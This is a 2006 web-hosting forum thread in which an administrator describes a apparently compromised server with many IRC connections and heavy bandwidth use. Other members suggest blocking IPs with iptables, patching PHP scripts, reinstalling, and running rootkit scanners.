#1  
Old 1st October 2006, 19:05
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts
Default Server Abuse

Hi. I'm positive that certain users are abusing the bandwidth and perhaps have compromised the server for other uses. I notice a huge amount of bandwidth being consumed by the server and when I do a netstat, I notice things like numerous ircd, tr-rsrb-p1 connections and a huge ammount of http connections from the same IP (or extreamly similar on the same subnet)
It takes about 3 minutes to perform a netstat > list.txt command. Beleive me, it's not a slow server...until now.

Where should I start? I'm a little taken that the firewall has no effect on these connections.
Reply With Quote
Sponsored Links
  #2  
Old 1st October 2006, 20:40
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts
Default

Here is an example of what I see in my netstat
over 200 occurances of
Code:
tcp        0      0 webserver.bcsolutions:60859 realmadrid.pl:ircd          CLOSE_WAIT  5784/-bash
and maybe 200 occurance of
Code:
tcp        0    178 webserver.bcsolutions:44205 88.84.148.137:tr-rsrb-p1    LAST_ACK    -
These are only two of the absolute worst examples. This is normally a pretty quiet corner of the internet. I was having lots of fun killing the processes for a while, but they still always seem to come back.

Last edited by godsdog; 1st October 2006 at 22:14.
Reply With Quote
  #3  
Old 2nd October 2006, 03:10
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts
Default

Well, I turned if off for a few hours and it seems that they've all went away (who knows for how long) It's too bad these domains have to lose service for so long just to regain control. I still want to know how to prevent this from happening. I've got netstat outputs if it's any help.

>edit<

I am now performing commands like the following...is this effective? And if so, how to I block the realmadrid.pl?
Code:
iptables -A INPUT -s  64.233.167.99 -j DROP

Last edited by godsdog; 2nd October 2006 at 05:53.
Reply With Quote
  #4  
Old 2nd October 2006, 07:47
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts
Default

Well, I don't have to turn off the webserver in order to get on the net anymore so I'm guessing the iptables command has saved the day. I hope this thread comes in handy for anyone else battling wannabe hackers. This has made me think a little more seriously about passwords and other stuff.

Does anyone have any other suggestions for preventing and blocking or maybe even more on what and where to look for stuff regarding security? Thanks for anything else. It's been quite a day and I could have used a tip or two. Oh well, onward and upward. Cheers!
Reply With Quote
  #5  
Old 2nd October 2006, 12:32
till till is online now
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 35,502
Thanks: 813
Thanked 5,264 Times in 4,128 Posts
Default

These are the typical symtoms for a insecure PHP or CGI script that allows remote commad executions. Please check that all forums and CMS systems like phpbb and mabo are patched and up to date on your server. Enable PHP safemode in all sites where it is possible without breaking the installed PHP scripts.
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
Reply With Quote
  #6  
Old 2nd October 2006, 13:08
sjau sjau is offline
Local Meanie
 
Join Date: Apr 2006
Location: Switzerland
Posts: 1,138
Thanks: 4
Thanked 54 Times in 50 Posts
Default

If the server truly has been compromised there's only one thing to do:

Total reinstall - as you can never be sure what's on the server... what was altered.... just have a go... if you notice unusual behaviour again then you might consider to do that.
Reply With Quote
  #7  
Old 3rd October 2006, 01:39
godsdog godsdog is offline
Member
 
Join Date: Apr 2006
Posts: 50
Thanks: 0
Thanked 0 Times in 0 Posts
Default

Thanks for the advice on Safe Mode. I'll google up some literature on it. I've always seen it but never understood what it does.
Yesterday the server was using all bandwidth avaliable and locking up our network for internet access which made me think they were hosting files or something, but ever since I've banned their IP addresses, it's back to normal. I'm definitly taking the log files seriously and am ashamed to admit it but things started getting a little wonky last week. I'll know better next time.
Reply With Quote
  #8  
Old 3rd October 2006, 07:26
sjau sjau is offline
Local Meanie
 
Join Date: Apr 2006
Location: Switzerland
Posts: 1,138
Thanks: 4
Thanked 54 Times in 50 Posts
 
Default

Install chkrootkit and rkhunter (Howtos in the howto section) and see if they find somethinge
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
php Apps email not going through palkat General 8 21st September 2011 05:35
Statistic not working mzo Installation/Configuration 49 20th April 2011 12:19
server blocked/stopped by host Ovidiu Technical 11 14th February 2006 10:50
Email - Ueb-Miau mazhar Installation/Configuration 5 21st December 2005 10:01
The Perfect Setup Suse 9.3 - Postfix problems new_bee05 HOWTO-Related Questions 20 25th November 2005 02:30


All times are GMT +2. The time now is 14:12.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.